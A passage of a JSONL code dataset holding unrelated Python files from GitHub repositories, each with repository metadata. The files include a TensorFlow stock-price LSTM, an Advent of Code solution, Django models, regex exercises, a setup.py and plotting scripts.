= 7\ndata_dim = 5\nhidden_dim = 10\noutput_dim = 1 #hidden_size\n\nxy = np.loadtxt('data-02-stock_daily.csv', delimiter=',')\nxy = xy[::-1] #시간순으로 revearse\n#print(xy[0])\n#print('------------')\nxy = minmax_scale(xy) # 데이터 정규화\n#xy = MinMaxScaler().fit_transform(xy) # 데이터 정규화\n#print(xy[0])\n#exit(0)\nx = xy # input=1st~5th\ny = xy[:, [-1]] # output=5th\n#print(x)\n#exit()\n#print(y.shape)\n\ndataX = []\ndataY = []\n\nfor i in range(0, len(y) - seq_length):\n _x = x[i : i + seq_length] #1~7일치의 개시/최고/최저/사이즈/종료 값\n _y = y[i + seq_length] #8일차의 종료값\n #print('X=', _x, \"-> Y=\", _y)\n\n dataX.append(_x)\n dataY.append(_y)\n\n\ntrain_size = int(len(dataY) * 0.7)\ntest_size = len(dataY) - train_size\ntrainX = np.array(dataX[0:train_size])\ntestX = np.array(dataX[train_size:len(dataX)])\ntrainY = np.array(dataY[0:train_size])\ntestY = np.array(dataY[train_size:len(dataY)])\n\n# placeholders\nX = tf.placeholder(tf.float32, [None, seq_length, data_dim])\nY = tf.placeholder(tf.float32, [None, 1])\n\n#LSTM Cell\ncell = tf.contrib.rnn.BasicLSTMCell(num_units=hidden_dim, state_is_tuple=True)\ncell = tf.contrib.rnn.MultiRNNCell([cell] * 4, state_is_tuple=True)\noutputs, _state = tf.nn.dynamic_rnn(cell, X, dtype=tf.float32)\n# Y_pred에서 마지막의 output만 쓰겠다\nY_pred = tf.contrib.layers.fully_connected(outputs[:, -1], output_dim, activation_fn=None)\n#print(outputs[:, -1])\n#exit()\n\n#cost function\nloss = tf.reduce_sum(tf.square(Y_pred - Y))\noptimizer = tf.train.AdamOptimizer(0.01)\ntrain = optimizer.minimize(loss)\n\n#학습\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\n\nfor i in range(1000):\n _, l, o, p = sess.run([train, loss, outputs, Y_pred], feed_dict={X: trainX, Y: trainY})\n if i % 100 == 0:\n print(\"step={}, loss={}\".format(i, l))\n #print()\n #print(\"real_output={}\\npredict={}\".format(o[0], p[0]))\n\ntestPredict = sess.run(Y_pred, feed_dict={X: testX})\n#print(np.mean(testY - testPredict))\n#accuracy = tf.reduce_mean(tf.cast(tf.equal(Y, predicted), dtype=tf.float32))\n\n\nimport matplotlib.pyplot as plt\nplt.plot(testY)\nplt.plot(testPredict)\nplt.show()","repo_name":"bart2001/machine_learning","sub_path":"lab12/rnn_with_time_series.py","file_name":"rnn_with_time_series.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"73743434717","text":"from sys import stdin\nfrom dateutil.parser import parse\n\n\nids = [l.split(']') for l in stdin.read().splitlines()]\ndata = {}\nfor i in ids:\n d = parse(i[0][1:])\n data[d] = i[1].split()[1][1:]\n\nm = 0\nstat = {}\nfor k in sorted(data.keys()):\n if data[k] == \"sleep\":\n m = k.minute\n elif data[k] == \"p\":\n for x in range(m, k.minute):\n stat[g][x] += 1\n else:\n g = int(data[k])\n if not g in stat:\n stat[g] = {x: 0 for x in range(60)}\n\ng = sorted(stat, key=lambda x: sum(stat[x].values()), reverse=True)[0]\nprint(g * max(stat[g], key=stat[g].get))\n\nm = 0\n\nfor g in stat:\n for x in stat[g]:\n if stat[g][x] > m:\n m = stat[g][x]\n mx = x\n mg = g\n\nprint(m, mx, mg, mg*mx)","repo_name":"fnuttplus/advent","sub_path":"2018/04.py","file_name":"04.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"74350052637","text":"import json\nimport os\n\nfrom src.main import global_log_fields\n\n\ndef log_trace(message, **data):\n log_entry = dict(\n severity=\"TRACE\",\n message=message,\n component=\"transcoding\",\n **data,\n **global_log_fields\n )\n\n print(json.dumps(log_entry))\n\n\ndef log_error(message, error):\n log_entry = dict(\n severity=\"ERROR\",\n message=message,\n error=error,\n component=\"transcoding\",\n file_system=os.listdir(\"/tmp\")\n ** global_log_fields\n )","repo_name":"hicks927/FuncTranscodeAAC","sub_path":"src/logging.py","file_name":"logging.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"15063022110","text":"import tensorflow as tf\nimport numpy as np\n\nconductivity_1 = 16\nconductivity_2 = 56\nheat_filter_1 = conductivity_1 / 3. * np.asarray([[1., 1., 1.], [1., -8., 1.], [1., 1., 1.]]).reshape(3,3,1,1)\nheat_filter_2 = conductivity_2 / 3. * np.asarray([[1., 1., 1.], [1., -8., 1.], [1., 1., 1.]]).reshape(3,3,1,1)\n\n################\nimport scipy.io as sio\nu1 = sio.loadmat('/home/hope-yao/Downloads/solution_6666.mat')['U1'][0][1:-1,1:-1]\nf1 = sio.loadmat('/home/hope-yao/Downloads/q_6666.mat')['F1'][0][1:-1,1:-1]\n\nf_input = tf.placeholder(tf.float32, shape=(1, 64, 64, 1))\nu_opt = tf.Variable(tf.zeros((1,64,64,1)))\npadded_input = tf.pad(u_opt, [[0, 0], [1, 1], [1, 1], [0, 0]], \"SYMMETRIC\") # convolution with symmetric padding at boundary\nf_pred_opt = tf.nn.conv2d(input=padded_input, filter=heat_filter_1, strides=[1, 1, 1, 1], padding='VALID')\nloss = tf.reduce_mean(tf.abs(f_pred_opt - f_input))\nopt = tf.train.AdamOptimizer(0.1)\ngrads_g = opt.compute_gradients(loss)\napply_gradient_op = opt.apply_gradients(grads_g)\ninit_op = tf.initialize_variables(tf.all_variables())\n\n## training starts ###\nFLAGS = tf.app.flags.FLAGS\ntfconfig = tf.ConfigProto(\n allow_soft_placement=True,\n log_device_placement=True,\n)\ntfconfig.gpu_options.allow_growth = True\nsess = tf.Session(config=tfconfig)\ninit = tf.global_variables_initializer()\nsess.run(init)\n\nloss_val_hist =[]\nx_output_val_hist = []\nfor t in np.linspace(0., 1., 10):\n x_output_val, loss_val, _ = sess.run([u_opt, loss, apply_gradient_op], {f_input:f1.reshape(1,64,64,1)})\n loss_val_hist += [loss_val]\n x_output_val_hist += [x_output_val]\n\nimport matplotlib.pyplot as plt\nplt.figure()\nplt.plot(loss_val_hist)\nplt.figure()\nplt.imshow(x_output_val_hist[-1][0,:,:,0],cmap='hot')\nplt.colorbar()\nplt.show()\n\nprint('done')\n\nimport matplotlib.pyplot as plt\nplt.imshow(f1,cmap='hot')\nplt.colorbar()\nplt.show()\n","repo_name":"ymlasu/FEA-Net","sub_path":"code_testing/inverse_flow.py","file_name":"inverse_flow.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"41383445388","text":"from django.db import models\nfrom django.contrib.auth.models import User\n\n\nclass Lesson(models.Model):\n name = models.CharField(\n max_length=250,\n verbose_name='название',\n )\n url_to_video = models.URLField(\n verbose_name='ссылка на видео',\n )\n viewing_duration = models.PositiveIntegerField(\n verbose_name='длительность просмотра',\n )\n last_viewed_date = models.DateTimeField(\n null=True,\n blank=True,\n verbose_name='дата последнего просмотра'\n )\n\n class Meta:\n verbose_name = 'урок'\n verbose_name_plural = 'уроки'\n ordering = ['name']\n\n def __str__(self):\n return self.name\n\n\nclass Product(models.Model):\n name = models.CharField(\n max_length=250,\n verbose_name='название'\n )\n owner = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n verbose_name='владелец',\n )\n lessons = models.ManyToManyField(\n Lesson,\n related_name='products'\n )\n\n class Meta:\n verbose_name = 'продукт'\n verbose_name_plural = 'продукты'\n ordering = ['name']\n\n def __str__(self):\n return self.name\n\n\nclass AccessToProduct(models.Model):\n product = models.ForeignKey(\n Product,\n on_delete=models.CASCADE\n )\n user = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n )\n\n def __str__(self):\n return f\"{self.user} имеет доступ к {self.product}\"\n\n\nclass ViewLesson(models.Model):\n user = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n )\n lesson = models.ForeignKey(\n Lesson,\n on_delete=models.CASCADE,\n )\n viewing_time = models.PositiveIntegerField(\n default=0,\n verbose_name='время просмотра',\n\n )\n status = models.BooleanField(\n default=False,\n verbose_name='cтатус',\n )\n\n def __str__(self):\n return (f\"{self.user} просмотрел {self.lesson} \"\n f\"({'Просмотрено' if self.status else 'Не просмотрено'})\")\n\n def update_status(self):\n if int(self.viewing_time) > 0:\n percent_viewed = int((int(self.viewing_time)\n / int(Lesson.viewing_duration)) * 100)\n self.status = percent_viewed >= 80\n else:\n self.status = False\n self.save()\n","repo_name":"trubnss/test_task","sub_path":"test_task/test_task/product/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"9113753549","text":"import numpy as np \nimport pandas\nimport csv\nfrom collections import Counter\nimport pickle\n\n\ndef modify(d, val):\n\tfor key in d:\n\t\td[key] = round(d[key]/val, 2)\n\nif __name__ == '__main__':\n\n\n\t# data = pandas.read_csv('thresh_2.5_5.csv', delimiter=',', low_memory=False, header= None).as_matrix()\n\tdemo1 = pandas.read_excel('SV1.xlsx').as_matrix()\n\tdemo2 = pandas.read_excel('SV2.xlsx').as_matrix()\n\n\twith open('../../Data/cf/u_dict.pickle', 'rb') as handle:\n\t\tu_dict = pickle.load(handle)\n\n\tfile = open('../../Data/cf/5_k_prototype.txt', 'r') \n\n\tcluster = 0\n\tuser_cluster = {}\n\tcluster_dict = {} #num users in each cluster\n\tsumm = 0\n\tfor line in file:\n\t\tusers = line.split(\" \")\n\t\tcluster_dict[cluster] = len(users)\n\t\tsumm += len(users)\n\t\t# print(str(cluster)+\" \"+str(len(users)))\n\t\tfor i in range(len(users)-1):\n\t\t\tuser_cluster[int(users[i])] = cluster\n\t\tcluster += 1\n\n\n\tnum_clusters = cluster\n\tgend = [Counter() for i in range(num_clusters)]\n\taged = [Counter() for i in range(num_clusters)]\n\tlocd = [Counter() for i in range(num_clusters)]\n\n\n\tcount = 0\n\tfor i in range(demo1.shape[0]):\n\t\tuser = str(demo1[i,1]) #phone number\n\t\tif user not in u_dict:\n\t\t\tcontinue\n\t\tcount += 1\n\t\tcluster = user_cluster[u_dict[user]]\n\t\tgender = demo1[i,3]\n\t\tage = demo1[i,4]\n\t\tloc = demo1[i,6] #location\n\t\tgend[cluster][gender] += 1\n\t\taged[cluster][age] += 1\n\t\tlocd[cluster][loc] += 1 \n\n\tprint(count)\n\tprint(summ)\n\tprint(num_clusters)\n\n\tfor i in range(len(gend)):\n\t\tprint(\"-----------\"+str(i)+\"---------\")\n\t\tmodify(gend[i],sum(gend[i].values()))\n\t\tprint(gend[i])\n\n\n\tprint(\"\\n\\n\")\n\tfor i in range(len(aged)):\n\t\tprint(\"-----------\"+str(i)+\"---------\")\n\t\tmodify(aged[i], sum(aged[i].values()))\n\t\tprint(aged[i])\n\n\tprint(\"\\n\\n\")\n\tfor i in range(len(locd)):\n\t\tprint(\"-----------\"+str(i)+\"---------\")\n\t\tmodify(locd[i], sum(locd[i].values()))\n\t\tprint(locd[i])\n\t# print(gend)\n\t# print(aged)\n\n\n\tpregd = [Counter() for i in range(num_clusters)]\n\tsmalld = [Counter() for i in range(num_clusters)]\n\tchildd = [Counter() for i in range(num_clusters)]\n\n\tcount = 0\n\tfor i in range(demo2.shape[0]):\n\t\tuser = str(demo2[i,1]) #phone number\n\t\tif user not in u_dict:\n\t\t\tcontinue\n\t\tcount += 1\n\t\tcluster = user_cluster[u_dict[user]]\n\t\tpreg = demo2[i,3]\n\t\tsmall_kid = demo2[i,4]\n\t\tchild = demo2[i,5] #location\n\t\tpregd[cluster][preg] += 1\n\t\tsmalld[cluster][small_kid] += 1\n\t\tchildd[cluster][child] += 1 \n\n\tprint(count)\n\tprint(summ)\n\tprint(\"\\n\\n\")\n\tfor i in range(len(pregd)):\n\t\tprint(\"-----------\"+str(i)+\"---------\")\n\t\tmodify(pregd[i], sum(pregd[i].values()))\n\t\tprint(pregd[i])\n\n\tprint(\"\\n\\n\")\n\tfor i in range(len(smalld)):\n\t\tprint(\"-----------\"+str(i)+\"---------\")\n\t\tmodify(smalld[i], sum(smalld[i].values()))\n\t\tprint(smalld[i])\n\n\tprint(\"\\n\\n\")\n\tfor i in range(len(childd)):\n\t\tprint(\"-----------\"+str(i)+\"---------\")\n\t\tmodify(childd[i], sum(childd[i].values()))\n\t\tprint(childd[i])\n","repo_name":"muskaankularia/Fair-recommendation-system-","sub_path":"3_data_analysis/demog/demog.py","file_name":"demog.py","file_ext":"py","file_size_in_byte":2838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"72556572958","text":"import re\n\npattern = r\"%(?P[A-z][a-z]+)%([^\\|\\$\\%\\.]?)+<(?P\\w+)>([^\\|\\$\\%\\.]?)+\\|(?P\\d+)\\|([^\\|\\$\\%\\.0-9]?)+(?P\\d+\\.?\\d+)\\$\"\ntotal_income = 0\ntext = input()\n\nwhile not text == 'end of shift':\n match = re.match(pattern, text)\n if match:\n x = match.groupdict()\n print(f\"{x['name']}: {x['product']} - {int(x['count']) * float(x['price']):.2f}\")\n total_income += int(x['count']) * float(x['price'])\n\n text = input()\nprint(f'Total income: {total_income:.2f}')\n\n\n\nimport re\n\npattern = r'%(?P[A-Z][a-z]+)%[^\\|\\$\\%\\.]*<(?P[\\w]+)>[^\\|\\$\\%\\.]*\\|(?P\\d+)\\|([^\\|\\$\\%\\.]*?(?P\\d+\\.\\d+|\\d+)\\$)'\n\nTotal_income = 0\nwhile True:\n\n command = input()\n if command == \"end of shift\":\n break\n matches = re.finditer(pattern, command)\n\n for m in matches:\n Total_income += int(m.group('count')) * float(m.group('price'))\n price = int(m.group('count')) * float(m.group('price'))\n print(f\"{m.group('name')}: {m.group('product')} - {price:.2f}\")\nprint(f\"Total income: {Total_income:.2f}\")\n\n\n\n\n\n\n\n# import re\n#\n# pattern = \\\n# \tr\"^(%(?P[A-Z][a-z]+)%).*(<(?P\\w+)>).*\" \\\n# \tr\"(\\|(?P\\d+)\\|)([^\\d]*)((?P\\d+(\\.\\d+)?)\\$)$\"\n# total = 0\n#\n# data = input()\n# while not data == \"end of shift\":\n# \tmatch = re.match(pattern, data)\n# \tif match:\n# \t\tname, product = match.group(\"name\"), match.group(\"product\")\n# \t\tcost = int(match.group(\"count\")) * float(match.group(\"price\"))\n# \t\tprint(f\"{name}: {product} - {cost:.2f}\")\n# \t\ttotal += cost\n# \tdata = input()\n#\n# print(f\"Total income: {total:.2f}\")\n\n\n\n\n\n\n# import re\n#\n#\n# cust_pattern = r'(?<=\\%)([A-Z][a-z]+)(?=\\%)'\n# prod_pattern = r'(?<=\\<)([\\w]+)(?=\\>)'\n# count_pattern = r'(?<=\\|)([\\d]+)(?=\\|)'\n# price_pattern = r'([\\d]+(\\.[\\d]+)?)(?=\\$)'\n# income = 0\n# while True:\n# data = input()\n# if data == 'end of shift':\n# break\n# m_cust = re.search(cust_pattern, data)\n# m_prod = re.search(prod_pattern, data)\n# m_count = re.search(count_pattern, data)\n# m_price = re.search(price_pattern, data)\n# if m_cust and m_prod and m_count and m_price:\n# customer = m_cust.group()\n# product = m_prod.group()\n# count = int(m_count.group())\n# price = float(m_price.group())\n# else:\n# continue\n# total=count*price\n# print(f'{customer}: {product} - {total:.2f}')\n# income += total\n#\n# print(f'Total income: {income:.2f}')","repo_name":"ilto86/SoftUni-Python","sub_path":"Python Fundamentals/More Exercises/Regular_Expressions - More_Exercises/02_SoftUni_Bar_Income.py","file_name":"02_SoftUni_Bar_Income.py","file_ext":"py","file_size_in_byte":2459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"35036772728","text":"import os\nimport io\nfrom setuptools import find_packages, setup\n\ndef extract_version():\n \"\"\"\n Extracts version values from the main matplotlib __init__.py and\n returns them as a dictionary.\n \"\"\"\n with open('rodeo/__init__.py') as fd:\n for line in fd.readlines():\n if (line.startswith('__version__')):\n exec(line.strip())\n return locals()[\"__version__\"]\n\n\nsetup(\n name=\"rodeo\",\n # Increase the version in ggplot/__init__.py\n version=extract_version(),\n author=\"Greg Lamp\",\n author_email=\"greg@yhathq.com\",\n url=\"https://github.com/yhat/rodeo/\",\n license=\"BSD\",\n packages=find_packages(),\n package_dir={\"rodeo\": \"rodeo\"},\n package_data={\n \"rodeo\": [\n \"rodeo-ascii.txt\",\n \"static/ace/snippets/*.js\",\n \"static/ace/*.js\",\n \"static/css/*\",\n \"static/fonts/*\",\n \"static/img/*\",\n \"static/js/*.js\",\n \"static/js/lib/*.js\",\n \"static/js/lib/*.map\",\n \"templates/*.html\",\n \"templates/partials/*.html\"\n ]\n },\n description=\"an ide for data analysis in python\",\n # run pandoc --from=markdown --to=rst --output=README.rst README.md\n long_description=io.open(\"README.rst\", encoding='utf8').read(),\n install_requires=[\n \"ipython>=3.0.0\",\n \"Flask>=0.10.1\",\n \"jedi\",\n \"docopt\",\n \"pyzmq>=13\",\n \"markdown2\"\n ],\n classifiers=['Intended Audience :: Science/Research',\n 'Intended Audience :: Developers',\n 'Programming Language :: Python',\n 'Topic :: Software Development',\n 'Topic :: Scientific/Engineering',\n 'Operating System :: Microsoft :: Windows',\n 'Operating System :: POSIX',\n 'Operating System :: Unix',\n 'Operating System :: MacOS',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.3'],\n zip_safe=False,\n entry_points={\n 'console_scripts': [\n 'rodeo = rodeo.cli:cmd',\n ]\n }\n)\n\n","repo_name":"jrowen/dcaffe","sub_path":"rodeo/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"60"} +{"seq_id":"15581869675","text":"from ast import ExceptHandler\nimport datetime\nfrom logging import exception\n\n\nclass Employe :\n # Definition du constructeur \n def __init__(self, matricule, nom, prenom, dateNaissance, dateEmbauche, salaireBase):\n self.matricule = matricule\n self.nom = nom\n self.prenom = prenom\n self.dateNaissance = dateNaissance\n self.dateEmbauche = dateEmbauche\n self.salaireBase = salaireBase\n\n # Definition des methodes de la classe Employe\n \n def calcul_Age(self):\n from datetime import datetime\n anneeActuelle = datetime.today().year \n anneeNaissance = datetime.strptime(lireStrNaissance, '%d-%m-%Y').date().year\n age = anneeActuelle - anneeNaissance\n #print(age)\n return age\n\n def calcul_Anciennete(self):\n from datetime import datetime\n anneeActuelle = datetime.today().year\n anneeEmbauche = datetime.strptime(lireStrEmbauche, '%d-%m-%Y').date().year\n anciennete = anneeActuelle - anneeEmbauche\n return anciennete\n\n def calcul_Augmentation(self):\n if self.calcul_Anciennete() < 5:\n augmentation = lireSalaireBase * 0.02\n return augmentation\n elif self.calcul_Anciennete() < 10:\n augmentation = lireSalaireBase * 0.05\n return augmentation\n else :\n augmentation = lireSalaireBase * 0.1\n return augmentation\n\n def afficherEmploye(self):\n print(\" \")\n print(\"*************** INFORMATIONS EMPLOYE *******************\")\n print(\" \")\n \n print(\"- Matricule: \" + str(self.matricule))\n print(\" \")\n\n nomComplet = lireNom.upper() + \" \" + lirePrenom.capitalize()\n print(\"- Nom complet: \" + nomComplet)\n print(\" \")\n\n print('- Age: ' + str(self.calcul_Age()) + ' ans')\n print(\" \")\n\n print('- Anciennete: ' + str(self.calcul_Anciennete()) + ' ans')\n print(\" \")\n\n salaire_total = lireSalaireBase + self.calcul_Augmentation()\n print('- Salaire: ' + str(salaire_total) + ' Euros/an')\n print(\" \")\n\n print('- Augmentation annuelle en fonction anciennete: ' + str(self.calcul_Augmentation()) + ' Euros/an')\n print(\" \")\n \ntry: \n # Entrer les donnees Employe\n lireMatr = str(input(\"Entrez le matricule: \"))\n\n lireNom = str(input(\"Entrez le nom: \"))\n lirePrenom = str(input(\"Entrez le prenom: \")) \n\n from datetime import datetime\n lireStrNaissance = str(input(\"Entrer date de naissance jj-mm-aaaa: \"))\n \n lireStrEmbauche = str(input(\"Entrer date embauche jj-mm-aaaa: \"))\n\n lireSalaireBase = float(input(\"Entrez le salaire de base: \"))\n\n\n # Instanciation de la classe Employe\n myEmploye = Employe(lireMatr, lireNom, lirePrenom, lireStrNaissance, lireStrEmbauche, lireSalaireBase) \n myEmploye.afficherEmploye()\n \n\nexcept Exception as ex:\n print(ex)","repo_name":"damienSop/MonEntreprise_Python","sub_path":"Employe.py","file_name":"Employe.py","file_ext":"py","file_size_in_byte":2937,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"36481092993","text":"# -*- coding: utf-8 -*-\n##################################################################\n## ##\n## The Legend Of Zelda - A Link to the Rogue ##\n## Un projet de Methode de Developpement (MDD) ##\n## ##\n## Utils.py ##\n## ##\n## LEVEQUE Dorian & ROUE Evan S2P ENIB 22/04/2016 ##\n##################################################################\n\nimport sys\n\ndef goto(x=0, y=0):\n s_x = str(int(x)+1)\n s_y = str(int(y))\n txt = \"\\033[\" + s_y + \";\" + s_x + \"H\"\n sys.stdout.write(txt)\n\ndef write(text, color=\"white\", backgroundColor=\"black\", textForm = []):\n \n # appliquer de la couleur si indique en parametre\n foreground = dict()\n foreground[\"black\"] = 30\n foreground[\"red\"] = 31\n foreground[\"green\"] = 32\n foreground[\"yellow\"] = 33\n foreground[\"blue\"] = 34\n foreground[\"magenta\"] = 35\n foreground[\"cyan\"] = 36\n foreground[\"light gray\"] = 37\n foreground[\"dark gray\"] = 90\n foreground[\"light red\"] = 91\n foreground[\"light green\"] = 92\n foreground[\"light yellow\"] = 93\n foreground[\"light blue\"] = 94\n foreground[\"light magenta\"] = 95\n foreground[\"light cyan\"] = 96\n foreground[\"white\"] = 97\n \n background = dict()\n background[\"black\"] = 40\n background[\"red\"] = 41\n background[\"green\"] = 42\n background[\"yellow\"] = 43\n background[\"blue\"] = 44\n background[\"magenta\"] = 45\n background[\"cyan\"] = 46\n background[\"light gray\"] = 47\n background[\"dark gray\"] = 100\n background[\"light red\"] = 101\n background[\"light green\"] = 102\n background[\"light yellow\"] = 103\n background[\"light blue\"] = 104\n background[\"light magenta\"] = 105\n background[\"light cyan\"] = 106\n background[\"white\"] = 107\n \n for c in foreground : \n if c == color:\n foreColor = str(int(foreground[c]))\n sys.stdout.write(\"\\033[\"+foreColor+\"m\")\n break\n for b in background :\n if b == backgroundColor:\n backColor = str(int(background[b]))\n sys.stdout.write(\"\\033[\"+backColor+\"m\")\n break\n \n # appliquer une mise en forme si indique en parametre\n form = dict()\n form[\"bold\"] = 1\n form[\"underline\"] = 4\n \n for i in textForm:\n for f in form:\n if f == i:\n param = str(int(form[f]))\n sys.stdout.write(\"\\033[\"+param+\"m\")\n \n # ecrire dans le terminal:\n sys.stdout.write(text.encode(\"utf-8\"))\n \n # Re-initialisation de la mise en forme et des couleurs\n sys.stdout.write(\"\\033[0m\")\n\n\nif __name__==\"__main__\":\n #Test 1\n\n goto(1,20)\n write(\"test1\\n\", \"red\", \"white\", [\"bold\"])\n \n goto(10,50)\n write(\"test2\\n\", \"blue\", \"light gray\", [\"underline\"])\n \n goto(12,60)\n write(\"test3\\n\", \"green\", \"black\", [\"bold\", \"underline\"])\n \n","repo_name":"Neopibox/MDD","sub_path":"modules/Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":3488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"32864966184","text":"import numpy as np\r\n\r\ndef analyze(category_arr): \r\n arr_height, arr_width = category_arr.shape[:2]\r\n\r\n response = {\r\n 'criterion': {\r\n 'basic': [],\r\n 'personalize': [], \r\n },\r\n 'classes': [],\r\n 'score': 0\r\n }\r\n\r\n color_classes = [\"도로\", \"주택\", \"아파트\", \"공장\", \"강\", \"논밭\", \"녹지\", \"대형건물\", \"미분류\"]\r\n color_codes = [\"#000000\", \"#ffff00\", \"#965000\",\"#646464\",\"#000096\",\"#00ff00\",\"#007d00\",\"#9696fa\",\"#ffffff\"]\r\n\r\n colors, counts = np.unique(category_arr, return_counts=1)\r\n for idx, x in enumerate(colors):\r\n counts[idx] = 0\r\n\r\n # 10% ~ 90% 사이의 값은 중앙, 그 외는 외곽으로 판정\r\n hmin = arr_height * 0.1\r\n hmax = arr_height * 0.9\r\n wmin = arr_width * 0.1\r\n wmax = arr_width * 0.9\r\n\r\n for h in range(arr_height):\r\n for w in range(arr_width):\r\n if h >= hmin and h <= hmax and w >= wmin and w <= wmax:\r\n i = np.where((colors == category_arr[h][w]))\r\n counts[i[0][0]] += 1\r\n else:\r\n i = np.where((colors == category_arr[h][w]))\r\n counts[i[0][0]] += 0.7\r\n\r\n green_score = 0.0\r\n green_synergy = 0\r\n\r\n factory_road_score = 0.0\r\n convenience_score = 0.0\r\n\r\n house_score = 0.0\r\n house_count = 0\r\n apartment_count = 0\r\n\r\n development_score = 100\r\n\r\n for index, color in enumerate(colors):\r\n count = counts[index]\r\n proportion = (100 * count) / (sum(counts)) # 외곽 픽셀 0.7 반영\r\n ci = int(color)\r\n\r\n response['classes'].append({\"name\" : color_classes[ci] , \"color\": color_codes[ci], \"proportion\" : proportion})\r\n \r\n if(color == 6): # 녹지\r\n green_score += proportion\r\n development_score -= proportion\r\n green_synergy += 1\r\n elif(color == 3): # 공장\r\n factory_road_score -= proportion * 1.25 / 2\r\n elif(color == 7): # 대형건물\r\n if(proportion <= 20):\r\n convenience_score += proportion\r\n else:\r\n convenience_score += 20\r\n elif(color == 0): # 도로\r\n factory_road_score -= proportion * 1.25 / 10\r\n elif(color == 4): # 강\r\n green_score += proportion\r\n development_score -= proportion\r\n green_synergy += 1\r\n elif(color == 1): # 주택\r\n house_count = count\r\n elif(color == 2): # 아파트\r\n apartment_count = count\r\n elif(color == 5): # 논밭\r\n development_score -= proportion\r\n\r\n if(green_synergy == 2): #강 + 녹지 시너지\r\n green_score += 5\r\n\r\n if apartment_count + house_count != 0:\r\n house_score = (100 * apartment_count) / (apartment_count + house_count)\r\n else:\r\n house_score = 0\r\n \r\n response['criterion']['basic'].append({\"name\" : \"편의성 점수\", \"desc\" : \"주변의 대형 건물(관공서 등)의 비율\", \"score\" : convenience_score})\r\n response['criterion']['basic'].append({\"name\" : \"공장, 도로 점수\", \"desc\" : \"매연과 소음을 발생시키는 공장과 도로의 비율\", \"score\" : factory_road_score})\r\n response['criterion']['basic'].append({\"name\" : \"녹지, 강 점수\", \"desc\" : \"공기의 질과 정서적 안정에 도움을 주는 녹지와 수변공간의 비율\", \"score\" : green_score})\r\n response['criterion']['personalize'].append({\"name\" : \"주택/아파트 지수\", \"desc\" : \"구역에 주택과 아파트 중 어느 쪽이 많은지의 비율\", \"score\" : house_score})\r\n response['criterion']['personalize'].append({\"name\" : \"개발 지수\", \"desc\" : \"시내와 교외를 판단할 수 있는 개발도 점수\", \"score\" : development_score})\r\n \r\n response['score'] = green_score + factory_road_score + convenience_score\r\n\r\n return response\r\n","repo_name":"skku-capstone-2020-fall-group13/logic","sub_path":"comflogic/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":3569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"26628790369","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.transforms as transforms\nfrom matplotlib.lines import Line2D\nfrom matplotlib.patches import Rectangle\nimport seaborn as sns\nsns.set(style=\"whitegrid\")\n\ndf = pd.read_csv('summary_results_3.csv')\nprint(df.head())\ndf['Score'] = df['Score'].str.replace(r'%', r'.0').astype('float') / 100.0\n\n\ng = sns.factorplot(\"Location\",'Score','Configuration',data=df,kind='bar',col='KPI',legend=False)\nax1 = g.axes[0][0]\nax1.axhline(0.88,color='r',ls='-.')\ntrans = transforms.blended_transform_factory(ax1.get_yticklabels()[0].get_transform(), ax1.transData)\nax1.text(0,0.88, \"{:.2f}\".format(0.88), color=\"red\", transform=trans, ha=\"right\", va=\"center\")\nfor label in ax1.get_xticklabels():\n label.set_ha(\"right\")\n label.set_rotation(45)\nax2 = g.axes[0][1]\nax2.axhline(0.48,color='r',ls='-.')\n#trans = transforms.blended_transform_factory(ax2.get_yticklabels()[0].get_transform(), ax2.transData)\nax2.text(0,0.48, \"{:.2f}\".format(0.48), color=\"red\", ha=\"right\", va=\"center\")\nfor label in ax2.get_xticklabels():\n label.set_ha(\"right\")\n label.set_rotation(45)\n\nax3 = g.axes[0][2]\nax3.axhline(0.49,color='r',ls='-.')\n#trans = transforms.blended_transform_factory(ax3.get_yticklabels()[0].get_transform(), ax3.transData)\nax3.text(0,0.49, \"{:.2f}\".format(0.49), color=\"red\", ha=\"right\", va=\"center\")\nfor label in ax3.get_xticklabels():\n label.set_ha(\"right\")\n label.set_rotation(45)\n\ng.fig.subplots_adjust(top=0.8)\ng.fig.suptitle('Summary of results for trained, validated, and tested on footage of CCTVs that have category 3 rainfall')\nlines = Line2D([0], [0], color='r', linewidth=1, linestyle='-.')\nlengend_data = g._legend_data\nlabels= [\"2 - train on 4 CCTV's\"]\nlabels.extend(list(lengend_data.keys()))\nshapes = []\nshapes.append(lines)\nshapes.extend(list(lengend_data.values()))\n\nplt.legend(shapes,labels)\nplt.show()\n","repo_name":"yxinjiang/My_Utils","sub_path":"seaborn_catplot.py","file_name":"seaborn_catplot.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} 